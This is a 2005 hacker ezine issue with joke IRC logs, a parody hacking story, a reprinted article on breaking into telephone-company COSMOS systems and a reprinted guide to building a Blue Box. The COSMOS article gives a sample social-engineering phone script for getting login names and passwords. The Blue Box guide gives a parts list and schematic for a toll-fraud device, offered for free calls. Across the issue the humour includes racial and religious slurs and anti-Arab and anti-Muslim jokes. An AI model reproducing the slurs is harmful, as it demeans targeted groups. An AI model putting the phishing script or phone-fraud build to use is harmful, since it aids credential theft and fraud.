Copy Link
Add to Bookmark
Report
L elephants avec les trunks huge 03
************ SPECIAL NOTE: CDEJ MEMBERSHIP **********************
CDEJ membership fee... $10,000
Getting an article in CDEJ ezine... $100,000
Being banned from nearly all efnet IRC channels... priceless.
*****************************************************************
l'elephant avec les trunks huge
izzue three
Special Christmas Edition 2005
*
/\
/ \
___ / | __
/ \|____|/ \
/ / __ \ \ <--- h0h0h0!
/ | Oo | \
\___/| |\___/\
| |_| |_| \
| |/|__|\| \
| |__| |\
| |__| |_/ / \
| @ | | @ || @ | '
| |~~| || | -J. Elephant-
'ooo' 'ooo''ooo'
"CDEJ -hack the planet"
LAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLAWELLLA
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *CDEJ is so elite* *
* *Dirty Field trips in the palestinian camps* *
* *Secrets of the underground* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**
* *
* o0o honorary editor of this issue: o0o *
* -monkey longarm <:D> *
* *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
* *
* Christmas times! *
* To all of you people who don't celebrate Christams *
* for the following reasons: *
* - being m*slim (we still refuse to pronounce it) *
* - being atheist :-o> *
* - getting drunk on the 23rd and never wake up untill it's *
* too late *
* - commies and jew haters in deep denial *
* *
* "WE DON"T GIVE A FUCK!" *
**=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.**
*our newest member: m4ch14v3lli *
* "french are women" *
* *
*pet of the month: Jessie QUACKSON *
* Bird Flue infected Duck *
* *
*MONTHLY ASCII: -=:-o <-- teh efnet thug ascii *
* originally invented by hunt3rx *
* legal rights bought by CDEJ *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
*<s3ckz13> it's good to see some journalistic integrity within*
* the community once again *
* *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
*<haqrsanta> h0h0h0! *
*<zmda> nigger! *
*<w01f> I saw a tactical nuclear missle disintegrate a car *
* and was like lol *
*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=*.*=**.**
- "Feels like a deja vue!"
-Ariel Sharon
(on the 9th of december 2005, while supervising an Air Strike
simulation of the forthcoming bombing of the IRANian Nuclear
Fertilisation Base Camp)
*** Dictionary of Extended ASCII Art ***
:D? Thinking
:? Thinking deeply
@:D> Pilsbury Doughboy
o< Duck (with or without bird flu)
:<~ Runny nose (possibly from bird flu)
:D~ Fluid coming from mouth
8D Coke / Crack addict
x:F Same teeth as my cat
X:D Needs a haircut
x:D Just got a haircut
:-O> The Scream
>:D< The hug
{:-) Jim Carry
@:D Conan Obrian
#:-) Lenny Kravitz
]:-) A texan Hacker
:-)% wearing ma's perl when alone at her room :-O>
¦-)>< wearing dad's tox
*<:-)>> Santa cause it's christmas times! >:D<
(note to self: "don't forget to delete the ma's perl before posting")
[.]................................................................[.]
[x]....................[ issue # 3 15/12]..........................[x]
[.]................................................................[.]
[x]=[000] intro Monkey Longarms <:D> [x]
[.]................................................................[.]
[x]=[001] The Novel - trans :D? [x]
[.]................................................................[.]
[x]=[002] COSMOS - King Arthur [x]
[.]................................................................[.]
[x]=[003] Blue Box reinvented - Jester Sluggo [x]
[.]................................................................[.]
[x]=[004] linux-ftpd-ssl 0.17 remote root exploit -dumb0 (0day) [x]
[.]................................................................[.]
[x]=[005] Bluetooth sobexsrv remote syslog() exploit - set_ (0day)[x]
[.]................................................................[.]
[x]=[006] Outro Note - w01f [x]
[.]................................................................[.]
[000]..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..INTRO..[0x00]
Staff:
@:D
X:D <(Hair's too long) x:D <(Ok now I got a haircut that's better)
<:D>
--< Introduction
>-- Monkey Longarms <:D>
Hey guys. Today I'd like to include some beautiful poetry from one of our
affilate haqrs, trans. It is so beautiful :.) I encourage you all to send your
poetry in so that I can post it to the world! If your poetry is posted, and
then I get struck by lightning twice in the same day (and live), you win $100!
<ttransien> drew a cat
<ttransien> <ttransien> and a
<ttransien> <ttransien> <ttransien> cupcake
<ttransien> emoticons
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> and said it
<ttransien> <ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> was the
<ttransien> <ttransien> kitty's
<ttransien> birthday
<ttransien> <ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> in a javachat
<ttransien> <ttransien> <ttransien> <ttransien>
<ttransien> and these
<ttransien> <ttransien> other people
<ttransien> <ttransien> <ttransien> drew cakes
<ttransien> <ttransien> <ttransien> HAPPY BIRTHDAY KITTY
It is so nice. Guys I'd like to talk about a serious issue now. This is
issue of bird flu. I have done some interviews with various birds and they
all say the same thing: this issue needs more attention. White, capitalist,
republican Americans (being inherantly bad :-o war is so bad donut hurt us!
donut eat meat!) have injected birds with bird flu (just like they injected
africans with aids (after which africans subsequently 'injected' it into one
another!)). Here is an interview with a prominent duck activist, Jesse
Quackson, taken from IRC.
<Quackson> Thanks for having me.
<Longarms> You owe me. Ok, now tell us about how the evil republicans
are oppressing your people.
<Quackson> First of all, we have to work for a living. This is bad.
White humans have been eating us for years, so we should get
everything free, and be able to sit on ponds doing nothing
for the rest of our lives.
<Longarms> Talk about birdflu please k.thx
<Quackson> Basically I am convinced that white republican americans
injected us with bird flu and now refuse to provide us
with adequate amounts of theraflu(TM).
<Longarms> Have any proof?
<Quackson> Yes. They make more money than us. More of them go to school
than us. They live longer. This is clearly prejudiced.
<Longarms> Have you ever tried to get a job?
<Quackson> That is not the point. They OWE me. Change the subject.
Keep talking about bird flu.
<Longarms> So like, what would you like americans to do about the bird
flu problem?
<Quackson> Give us reperations. Give us all lots of ponds.
<Longarms> How will this solve your birdflu problem?
<Quackson> I'm sorry I have to go. FREE KEVIN
Ok as you can see nothing really came out of this. Today we have a nice
issue for you. The next b4b0 has not come out yet, so we're lacking technical
articles. Let's go to the fanmail.
--< Fanmail
>-- CDEJ Staff
Dear cdej -
Hey guys this zine is kewl! When I was a kid I haqd 234432 stock market
computers in the same day. Then I wore trendy european clothing and went
to raves in new york. I am a tru haqr. Can I be in yer club?
-- zero kewl
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
THIS IS AN AUTOMATICALLY GENERATED EMAIL. PLEASE DO NOT RESPOND.
Dear zero kewl -
Thank you for your interest in cdej! Every cdej canidate member goes
through a long, intensive screening process. Please begin by filling out
the membership application. It is 112 pages long and can be obtained
from #cdej/efnet. After you submit the application, a cdej member will
contact you in 10-12 months.
If accepted into further screening, you will be sent to the cdej screening
center in Quantico, VA. Here you will undergo some of the most stringent
physical and mental training on the planet. Out of the 10,000 people that
make it into this training every year, only 2 make it through.
Once through screening, you will be required to attend the advanced
astronaut training program at cape canaveral, FL, explosive ordnance school
in Kandahar, Afghanistan, and cia school in Langley, VA. You will then
be eligible for consideration by top ranking cdej members!
-----------------------------------------
Dear cdej -
Hey guys can you please help me perform acts of terrorism?
-- name withheld
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Dear name withheld -
CDEJ works with the CIA and FBI, as well as the DHS, to locate and capture
m*slim terrorist scum. In fact, we have our own 'interogation' center
(located in various boxcars along the nation's railways) free from the
restrictions these other agencies have.
In short, we will use the email headers to trace and haq yer computer
machine, then lock you up in a train and show you videos of us haqing
arabz.
--< CDEJ Prophile: trans
>-- CDEJ staff (monkey longarms)
Name: trans
Age: 62
Job: haqr
Home: Beirut Lebanon
Car: Don't have one
Pet: Ostrich
Girl: Don't have one
Comp: Don't have one
Favorite haqr experience:
"When I broke into secret computer machines and then
had to go to jail for a night. I haqd the locks of the
prison and then got out scot-free!"
--< CDEJ: The Novel -- An Epic Tale of Haqing Computer Machines
>-- :D? mystery author :D? Is it stephen king who knows :?
>-- Or maybe it is just trans?
1 - Bad news in the Morning
I woke up about 11:30am, to the muffled sound of mom sweatin' to the
oldies in the living room. Since I was unemployed, I laid in bed for
about another 2 hours, enjoying the small glints of Monday sun that
filtered through the various rips in the black garbage bags that
covered my bedroom's windows. Arising finally from bed, ignoring
the familiar clanking and clacking sounds caused by debris falling
from my blankets onto the floor, I lit a cigarette and set out on my
daily routine.
I stretched and walked over to the corner of the room, where a card
table functioned as an improvised computer desk. The 486SX whired
to life after I hit the switch; I sat down. Simultaneously booting
up and spitting on the carpet, I watched the BIOS routines take their
time counting memory. I could still hear mom out in the living room.
It was a bummer that she'd been out of the job. I had to deal with
her soap operas and boyfriends all day long.
I found a slice of pizza somewhere on the table and munched down.
Within a few minutes I was in what us computer experts call the
'brain' of the computer: the Disk Operating System (or DOS). You
really couldn't claim to be an expert in computers without knowing
a few DOS commands. In fact, I was more inclined to work from a
DOS prompt than the Windows GUI, just to kind of make myself feel
a little more elite. Basking in the warm glow of my talents, I typed
a few commands.
------------------------------------------------------------
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\trans> DI
'DI' is not recognized as an internal or external command,
operable program or batch file.
C:\Documents and Settings\trans>dir
Volume in drive C is elitehaqr
Volume Serial Number is 7625-8432
Directory of C:\Documents and Settings\SpecialJ
06/27/2004 12:04 AM <DIR> .
06/27/2004 12:04 AM <DIR> ..
11/21/2005 02:09 PM <DIR> Desktop
11/03/2005 06:06 PM <DIR> Favorites
06/28/2004 03:17 PM <DIR> My Documents
07/22/2005 04:11 PM <DIR> kodez
08/12/2005 11:12 AM <DIR> winnuke
08/12/2005 03:55 AM <DIR> ircdox
07/25/2005 11:55 PM <DIR> warez
11/19/2005 03:15 PM <DIR> wildcat
06/10/2004 08:20 PM <DIR> Start Menu
0 File(s) 0 bytes
11 Dir(s) 12,540,416 bytes free
C:\Documents and Settings\SpecialJ>netstat -an
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1026 0.0.0.0:0 LISTENING
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:1025 *:*
C:\Documents and Settings\SpecialJ>
------------------------------------------------------------
This last bit of information surprised me. There were ports
open on my computer. I'd spent a considerable amount of time
over the past 6 months studying computers, and I knew immediately
that this meant I was infected. Infected, as most hackers know,
is computer lingo for having a virus. I moved a hardcopy of CDEJ
#2 off the cardtable and onto the floor using a dramatic forearm
sweeping motion, and picked up my lit cigarette (which had
already burned a part of my mouse cord). I got to work.
------------------------------------------------------------
/join #cdej
<trans> hey guys I have some ports open can any of you help me?
<hunterx> I had ports one time I think you need to reformat, i had to
<hunterx> but then I reinstalled and there were still ports
<hunterx> make sure your windows cdrom isn't hacked like mine
/join #hack
<trans> hey guys I have some ports open can any of you help me?
** You were kicked from #hack by lothos (PhD in social engineering)
------------------------------------------------------------
LoU member lothos (notorious for his GSM frequency memorization
skills) had reacted violently to my innocuous question. LoU *had*
to be involved with this. These guys were as good as it gets. They
were even rumored to know some basic Unix, and have a history with
exotic, baffling technologies such as DDoS and warez.
I had to be careful. Everyone knows that you can't just go out
and bust LoU without proper planning. I mean, they're basically
LoD! They copied off the name (another 'legions of'), and their
premier member 'optik lenz' obviously ripped his nick from phiber
optik. They constantly write technically asinine articles to cover
up their eliteness with a fog of misperception. They were so elite
they didn't *need* to be creative or smart, so they purposely
appeared to outsiders as total morons.
Some friends of mine were going to be over at 8pm to play role
playing games. I had 8 hours.
I pulled on my wife beater
I downloaded winnuke.
I started mIRC again (it had crashed).
I put the movie 'Hackers' into my BetaMax player.
I turned on some 'techno' music.
I took out the trash.
I was ready to do my first hack.
... but first, I needed some food.
2 - The Mean Streets
I had to go to the store to get something to eat. I had about $20 worth
of foodstamps left, and it had to last me the rest of the month. As I
opened the front door, overdue notices and electricity bills drifted to the
ground like snowflakes. "Obviously", I thought to myself, "If I don't take
the first one inside, I'm not likely to take in the next 100."
I walked to the supermarket because our car had been up on blocks for
a few weeks, and probably wasn't going to be starting any time soon. I
had to hang outside the store for a couple hours because the lame assistant
manager kid wouldn't let me in wearing just my wife beater and jeans. So
I sat on the curb until I met a buddy of mine, who loaned me his shirt.
I bought some snickers bars and a PC Gamer magazine. Down isle 3
(feminine products, baby food, and hamburger helper) some girls started
kinda pointing and laughing to themselves. I waved at them to give them
a little thrill. I'm good with the ladies. Anyway I grabbed my stuff
and headed out the door. My friend was still out there, so we went over
to his house and smoked some doobz for about 2 weeks.
When I finally stumbled home, I had completely forgotten about LoU and
my haqr project and everything else. The day was dark and drizzly. It
was typical late November weather; brown leaves lined the sidewalks.
Their sweet smell of decay permeated the air. The crows, being especially
stuburn this year, were the only birds in sight. Their menacing 'caw'
could be heard periodically through my bedroom window and wallboards, which
had gaping holes between them.
Thunder announced itself. It would snow soon; the color of the sky
and my internal barometer left no doubt about this. It was getting
dark. Something told me that today, a seemingly normal though somewhat
cool, autumn day would be different than any other day that I'd ever
lived.
This turned out to be incorrect.
3 - :D? What was I doing? :? It is a mystery.
Eventually my mom paid the AOL and electricity bills and I got back on
mirc. After spending some time interested in Poke'mon and pogs, I
remembered the ports on my computer and logged back in to what many in
the community consider to be the heart of the haqr community: #cdej/efnet.
------------------------------------------------------------
<trans> hi
<w01f> hi
<Lozcar> welcome!
<hunterx> Hey!
<uplink> Shalom
[ ... always such a warm welcome :.) ]
<trans> can someone help me haq LoU?
<the_sniff> I have a botnet we can DDoS them
<trans> really?
<the_sniff> yeah I used it on my mom when I found out she was arab
** the_sniff was kicked by w01f (no arabs allowed)
<trans> dood i need his k0dez
------------------------------------------------------------
So to make a long story short the_sniff didn't really have a botnet
but was just lying to try to attain the rank of captain in CDEJ.
I was back to square 1. This frustration, coupled with the annoying
draft caused by a 2" hole in the floor, nearly drove me over the edge.
The anger passed, leaving in its place a good idea: social
engineering!
------------------------------------------------------------
/join #lou
trans (~nsync1985@aol.com) has joined #lou
*** trans is now known as kmitnick
<lothos> oohhh fear!
<kmitnick> hey guys kevin mitnick here
<lothos> hey mr mitnick!
<kmitnick> i was hoping you guys could help me out
<lothos> do you know the GSM frequencies for your nation?
<lothos> sure what can we help you with?
<lothos> /msg optiklenz dood dig this looser
<kmitnick> haha what looser is that? some lamer?
<kmitnick> i need access to you computer machines to
<kmitnick> do some secret haqing project
<kmitnick> involving yahoo chat
<lothos> sure. try 127.0.0.1, login: loozer pass: l4m3r
<kmitnick> SUCKERS!
<kmitnick> ./quit
/quit
------------------------------------------------------------
They had fell for it. LoU member lothos was convinced that I
was kevin mitnick, a great haqr in the lineup of great haqrs:
caroline meinel, e.goldstein (they say he molests children but
I don't believe them!), and all the great tallented people in
cDc (phear wintrojanz! phear pcanywhere!) With these kodez, I
was set. In the words of the great dade murphy: "I'm in".
If this LoU computer, no doubt residing somewhere deep in the
basement of lothos' mom's house, had ports on it, I could haq it.
I was a big fan of 'the happy hacker' and other CPM literature,
and had read all the guides to mostly harmless hacking. I was
well acquainted with telnet and port surfing. I began.
C:\> telnet 127.0.0.1 79
connection closed by remote host
They had a firewall. I had to be more creative.
C:\> ping 127.0.0.1
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.073 ms
^C
Ok I could ping flood them. This is kind of like winnuke, but
not traceable. I decided instead to wait and collect more intel.
After all, you can't just go busting down doors without knowing
what's up. Plus, my mom's check to the power company bounced.
Anyway, I don't think that LoU will be bothering me anymore, since
I have their ip address and they have ports. Some of them use unix
even though it's obsolete, but I'm pretty sure that's only optik
lenz and i don't want to deltree him anyway.
--< Ethnicity Corner
>-- Longarms
We here at CDEJ have decided to be a little more culturally sensitive.
To push this along, we've dedicated one section of each issue to topics
that highlight haqrs of non-white race, non-western background, and non-
English language. In other words, it's time for us to be prejudiced
against white Americans for once! Just like the NAACP!
Today's Ethnicity Corner subject is T'so T'sing T'su, a Chinese
hacker. He will share some of his hacking experiences in the Min-Xing
Valley!
----------------------
Hello! I T'so T'sing T'su, I called T'so shortly. Thank you very much
for hearing my list experiences of hacking abacus and computer in the
Chinese farm where I am farmer and student of engineering. I hope that you
can learn various culture hackers from this paper of experience!
In MinXing valley we have not many computer, because communist government
require all people over 5 year work in farm for 18 hours each today. I
am lucky child with computer and spend much hour on internet every weekend
when mother is at market. I have learned hacking technique from cdej and
other internet hacker that is rivaled to my kung fu technique. cdej also
know kung fu so they are friend. Monkey longarm has monkey technique, trans
has crane technique (with much crank kicking and banning), and lozcar has also
technique of arab rabit.
In china we have much doing with families and neighborhood rice and sushi
and judo and declaring war on north korea. We are busy peoples but i take the
time now then to study western culture of computer with lemonade and virus of
visual basic.
Thank you much and please adopt me!
---------------------
In a sad note, T'so was killed 3 days after emailing us this. This note was
intercepted by the communist Chinese government, and they felt that he had
revealed too much information about his country. So sad :.(
NOTE:
W01f and trans are NOT the same person, but two seperate people. In
fact, each of us has 3 or 4 distinct personalities. Case solved. (Also
trans is the little brother of w01f).
TODO:
- register plskthx.com
COSMOS
COmputer System for Mainframe OperationS
Part One
by King Arthur
Introduction
%%%%%%%%%%%%
Throughout the last decade, computers have played an ever growing role in
information storage and retrieval. In most companies, computerized databases
have replaced a majority of all paper records. Where in the past it would take
10 minutes for someone to search through stacks of paper for some data, the
same information can now be retrieved from a computer in a fraction of a
second.
Previously, proprietary information could be considered "safe" in a file
cabinet; the only way to see the data would be to have physical access to the
files. Now, somebody with a computer terminal and a modem can make a quick
phone call and access private records. It's unfortunate that there are
"hackers" who try to gain unauthorized access to computers. Yet, it is just as
unfortunate that most reported computer break-ins could have been prevented if
more thought and common sense went into protecting computers.
Hackers
%%%%%%%
There have been many cases of computer crime reported by the Bell
Operating Companies (BOCs), but it is hard to say how many actual break-ins
there are. Keep in mind that the only reported cases are those which are
detected. In an interview with an anonymous hacker, I was told of one of the
break-ins that may not have ever been reported. "My friend got the number when
he misdialed his business office -- that's how we knew that it was the phone
company's. It seems this Unix was part of some real big Bellcore computer
network," says the hacker.
The hacker explains that this system was one of many systems used by the
various BOCs to allow large Centrex customers to rearrange their Centrex
groups. It seems he found a text file on the system with telephone numbers and
passwords for some of Bellcore's development systems. "On this Bellcore system
in Jersey, called CCRS, we found a list of 20 some-odd COSMOS systems....
Numbers, passwords, and wire centers from all over the country!" He adds,
"Five states to be exact."
The hacker was able to gain access to the original Unix system because, as
he says, "Those guys left all the default passwords working." He was able to
login with a user name of "games" with the password being "games." "Once we
were on we found that a large number of accounts didn't have passwords. Mary,
John, test, banana, and system were some, to name a few." From there he was
able to eventually access several COSMOS database systems -- with access to ALL
system files and resources.
COSMOS
%%%%%%
COSMOS, an acronym for the COmputer System for Mainframe OperationS, is a
database package currently supported by Bellcore. COSMOS is presently being
used by every BOC, as well as by Cincinnati Bell and Rochester Telephone.
COSMOS replaces paper record-keeping and other mechanized record systems for
plant administration. COSMOS' original purpose was to alleviate congestion in
the Main Distributing Frame (MDF) by maintaining the shortest jumpers.
It can now maintain load balance in a switch and assign office equipment,
tie pairs, bridge lifters and the like. Additional applications allow COSMOS
to aid in "cutting-over" a new switch, or even generate recent change messages
to be input into electronic switches. COSMOS is most often used for
provisioning new service and maintaining existing service, by the following
departments: The frame room (MDF), the Loop Assignment Center (LAC), the
Recent Change Memory Assistance Center (RCMAC), the network administration
center, and the repair service.
Next year COSMOS will celebrate its 15th birthday, which is quite an
accomplishment for a computer program. The first version or "generic" of
COSMOS was released by Bell Laboratories in 1974. In March 1974, New Jersey
Bell was the first company to run COSMOS, in Passaic, New Jersey. Pacific
Telesis, NYNEX, Southern Bell, and many of the other BOCs adopted COSMOS soon
after. Whereas Southwestern Bell waited until 1977, the Passaic, NJ Wire
Center is still running COSMOS today.
Originally COSMOS ran on the DEC PDP 11/45 minicomputer. The package was
written in Fortran, and ran the COSNIX operating system. Later it was adapted
to run on the DEC PDP 11/70, a larger machine. Beverly Cruse, member of
Technical Staff, COSMOS system design at Bellcore, says, "COSNIX is a
derivation of Unix 1.0, it started out from the original Unix, but it was
adapted for use on the COSMOS project. It bears many similarities to Unix, but
more to the early versions of Unix than the current... The COSMOS application
now runs on other hardware understandard Unix."
"The newest version of COSMOS runs on the standard Unix System V operating
system. We will certify it for use on particular processors, based on the
needs of our clients," says Ed Pinnes, the District Manager of COSMOS system
design at Bellcore. This Unix version of COSMOS was written in C language.
Currently, COSMOS is available for use on the AT&T 3B20 supermini computer,
running under the Unix System V operating system. "There are over 700 COSMOS
systems total, of which a vast majority are DEC PDP 11/70's. The number
fluctuates all the time, as companies are starting to replace 11/70's with the
other machines," says Cruse.
In 1981 Bell Laboratories introduced an integrated systems package for
telephone companies called the Facility Assignment Control System (FACS). FACS
is a network of systems that exchanges information on a regular basis. These
are: COSMOS, Loop Facilities Assignment and Control System (LFACS), Service
Order Analysis and Control (SOAC), and Work Manager (WM). A service order from
the business office is input in to SOAC. SOAC analyzes the order and then
sends an assignment request, via the WM, to LFACS. WM acts as a packet switch,
sending messages between the other components of FACS. LFACS assigns
distribution plant facilities (cables, terminals, etc.) and sends the order
back to SOAC. After SOAC receives the information form LFACS, it sends an
assignment request to COSMOS. COSMOS responds with data for assigning central
office equipment: Switching equipment, transmission equipment, bridge lifters,
and the like. SOAC takes all the information from LFACS and COSMOS and appends
it to the service order, and sends the service order on its way.
Computer Security
%%%%%%%%%%%%%%%%%
Telephone companies seem to take the brunt of unauthorized access
attempts. The sheer number of employees and size of most telephone companies
makes it very difficult to keep tabs on everyone and everything. While
researching computer security, it has become evident that COSMOS is a large
target for hackers. "The number of COSMOS systems around, with dial-ups on
most of the machines... makes for a lot of possible break-ins," says Cruse.
This is why it's all the more important for companies to learn how to protect
themselves.
"COSMOS is power, the whole thing is a big power trip, man. It's like Big
Brother -- you see the number of some dude you don't like in the computer. You
make a service order to disconnect it; COSMOS is too stupid to tell you from a
real telco dude," says one hacker. "I think they get what they deserve:
There's a serious dearth of security out there. If kids like us can get access
this easily, think about the real enemy -- the Russians," jokes another.
A majority of unauthorized access attempts can be traced back to an
oversight on the part of the system operators; and just as many are the fault
of the systems' users. If you can keep one step ahead of the hackers,
recognize these problems now, and keep an eye out for similar weaknesses, you
can save your company a lot of trouble.
A hacker says, "In California, a friend of mine used to be able to find
passwords in the garbage. The computer was supposed to print some garbled
characters on top of the password. Instead the password would print out AFTER
the garbled characters." Some COSMOS users have half duplex printing
terminals. At the password prompt COSMOS is supposed to print a series of
characters and then send backspaces. Then the user would enter his or her
password. When the password is printed on top of the other characters, you
can't see what it is. If the password is being printed after the other
characters, then the printing terminal is not receiving the back space
characters properly.
Another big problem is lack of password security. As mentioned before,
regarding CCRS, many accounts on some systems will lack passwords. "On COSMOS
there are these standardized account names. It makes it easier for system
operators to keep track of who's using the system. For instance: all accounts
that belong to the frame room will have an MF in them. Like MF01, you can tell
it belongs to the frame room. (MF stands for Main Frame.) Most of these names
seem to be common to most COSMOS systems everywhere. In one city, none of
these user accounts have passwords. All you need is the name of the account
and you're in. In another city, which will remain unnamed, the passwords are
the SAME AS THE DAMN NAMES! Like, MF01 has a password of MF01. These guys
must not be very serious about security."
One of the biggest and in my eyes one of the scariest problems around is
what hackers refer to as "social engineering". Social engineering is basically
the act of impersonating somebody else for the sake of gaining proprietary
information. "I know this guy. He can trick anybody, does the best BS job
I've ever seen. He'll call up a telco office, like the repair service bureau,
that uses COSMOS. We found that most clerks at the repair service aren't too
sharp." The hacker said the conversation would usually take the following
course:
Hacker: Hi, this is Frank, from the COSMOS computer center. We've had a
problem with our records, and I'm wondering if you could help me?
Telco: Oh, what seems to be the problem?
H: We seem to have lost some user data. Hopefully, if I can correct the
problem, you people won't lose any access time today. Could you tell me
what your system login name is?
T: Well, the one I use is RS01.
H: Hmm, this could present a problem. Can you tell me what password and wire
center you use that with?
T: Well, I just type s-u-c-k-e-r for my password, and my wire centers are: TK,
KL, GL, and PK.
H: Do you call into the system, or do you only have direct connect terminals?
T: Well, when I turn on my machine I get a direct hook up. It just tells me
to login. But I know in the back they have to dial something. Hold on,
let me check. (3 Minutes later...) Well, she says all she does is call
555-1212.
H: OK, I think I have everything taken care of. Thanks, have a nice day.
T: Good, so I'm not gonna have any problems?
H: No, but if you do just give the computer center a call, and we'll take care
of it.
T: Oh, thank you honey. Have a nice day now.
"It doesn't work all the time, but we get away with it a good part of the
time. I guess they just don't expect a call from someone who isn't really part
of their company," says the hacker. "I once social engineered the COSMOS
control center. They gave me dial-ups for several systems, and even gave me
one password. I told them I was calling from the RCMAC and I was having
trouble logging into COSMOS," says another.
This last problem illustrates a perfect example of what I mean when I say
these problems can be prevented if more care and common sense went into
computer security. "Sometimes, if we want to get in to COSMOS, but we don't
have the password, we call a COSMOS dial-up at about 5 o'clock. To logoff of
COSMOS you have to hit a CONTROL-Y. If you don't, the next person who calls
will resume where you left off. A lot of the time, people forget to logoff.
They just turn their terminals off, in the rush of going home."
The past examples do not comprise the only way hackers get into systems,
but most of the problems shown here can exist regardless of what types of
systems your company has. The second article deals with solutions to these
problems.
+--------------------------------+
| Building Your Own Blue Box |
+--------------------------------+
| By |
| Jester Sluggo |
| Released: Nov. 27, 1986 |
+--------------------------------+
This Blue Box is based on the Exar 2207 Voltage Controlled Oscillator.
There are other ways to build Blue Boxes, some being better and some not as
good, but I chose to do it this way. My reason for doing so: because at the
time I started this project, about the only schematic available on BBS's was
the one written by Mr. America and Nickie Halflinger. Those plans soon (in
about 90 seconds) became very vague in their context with a couple in-
consistencies, but I decided to "rough it out" using those plans (based on the
Exar 2207 VCO) and build the Blue Box using that as my guide. During the
construction of the Blue Box, I decided to type-up a "more complete and clear"
set of Blue Box schematics than the file that I based mine on, in order to help
others who may be trying/thinking of building a Blue Box. I hope these help.
Note: You should get a copy of the Mr. America/Nickie Halflinger Blue Box
plans. Those plans may be of help to anyone who may have difficulty
understanding these plans. Also, these plans currently do not support CCITT.
+---------------------------------+
| Why should I build a Blue Box ? |
+---------------------------------+
Many of you may have that question, and here's my answer. Blue Boxing was
the origin of phreaking (excluding whistling). Without the advent of Blue
Boxes, I feel that some of the advances in the telecommunications industry
would've taken longer to develop (The need to stop the phone phreaks forced
AT+T Bell Laboratories to "step up" their development to stop those thieves!).
There is no harm in building a Blue Box (except the knowledge you will
gain in the field of electronics). Although there are software programs (Soft
Blue Boxes) available for many micro's that will produce the Blue Box
Multi-Frequency (MF) tones, they are not as portable as an actual Blue Box (you
can't carry your computer to a telephone, so you must use it from home which
could possibly lead to danger).
Many phreaks are announcing the end of the Blue Box Era, but due to
discoveries I have made (even on ESS 1A and possibly ESS 5), I do not believe
this to be true. Although many people consider Blue Boxing "a pain in the
ass", I consider Blue Boxing to be "phreaking in its' purest form". There is
much to learn on the current fone network that has not been written about, and
Blue Boxes are necessary for some of these discoveries. The gift of free fone
calls tends to be a bonus.
Note: Blue Boxes also make great Christmas gifts!
+---------------------------------------+
| Items needed to construct a Blue Box. |
+---------------------------------------+
Here is the list of items you will need and where you can get them. It
may be a good idea to gather some of the key parts (the chips, and especially
the potentiometers, they took about 6 months to back order through Digi-key. A
whole 6 fucking months!) before you start this project. Also, basic
electronics tools will be necessary, and you might want to test the circuit on
a bread board, then wire-wrap the final project. Also, you will need a box of
some sort to put it in (like the blue plastic kind at Radio Shack that cost
around $5.00).
Note: An oscilliscope should be used when tuning in the
potentiometers because the Bell system allows
only a 7-10% tolerance in the precision of the
frequencies.
Qty. Item Part No. Place
---------------------------------------------------
1 | 4 x 4 Keypad | | Digi-Key
6 | Inverter Chip | 74C04 |
32 | Potentiometer | |
1 | 4-16 Converter Chip| 74LS154 |
1 | 16 Key Decoder | 74C922 |
2 | 2207 VCO | XR2207CP | Exar Corp.
3 | .01 uf Capacitor | 272-1051 | Radio Shack
5 | .1 uf Capacitor | 272-135 | Radio Shack
2 | 1.5K Ohn Resistor | | Radio Shack
2 | 1.0K Ohm Resistor | | Radio Shack
1 | Speaker | | From an old Autovon fone.
1 | 9 Volt Battery | | Anywhere
The resistors should be a +/- 5% tolerance.
The speaker can be from a regular telephone (mine just happened to be from
an old Autovon phone). But make sure that you remove the diode.
The Potentiometers should have a 100K Ohm range (but you may want to make
the calculations yourself to double check).
The 9-volt battery can be obtained for free if you use your Radio Shack
Free Battery Club card.
The Exar 2207 VCO can be found if you call the Exar Corp. located in
Sunnyvale, California. Call them, and tell them the state you live in, and
they'll give the name and phone number to the distributor that is located
closest to you. The 2207 will vary from about $3.00 for the silicon-grade
(which is the one you'll want to use) to about $12.00 for the high-grade
Military chip.
Note: When you call Exar, you may want to ask them to send you the
spec-sheets that gives greater detail as to the operation and construction of
the chip.
+-------------------+
| Schematic Diagram |
+-------------------+
+--------------+ +-------------+
| 1 2 3 A | | Figure #1 |
| 4 5 6 B | +-------------+
| 7 8 9 C | | Logic Side |
| * 0 # D | +-------------+
++-+-+-+-+-+-+-+
1 | 3 | 5 | 7 | (VCC)
| 2 | 4 | 6 | 8 (+5 Volts) +----+
| | | | | | | | [+] | _|_
| | | | | | | | | | X_/GND
+--+-+-+-+-+-+-+-+----+ +--+----------+---+
| 2 | 11| 10| 7 | | | 14 7 |
(.01C) | | 3 | 4 | 8 | 1 12+------+1 |
+--||---+5 13+------+2 (*74C04*) |
_|_ | | | |
X_/GND | (*74C922*) | +-----------------+
+--||-+6 |
|(.1C)| |
_|_ | |
X_/GND | 9 17 16 15 14 18|
+--+--+--+--+--+---+--+
| | | | | |
_|_ A B C D |
GNDX_/ | | | | [+] (VCC) [+] (VCC)
| | | | (+5 volts) | (+5 volts)
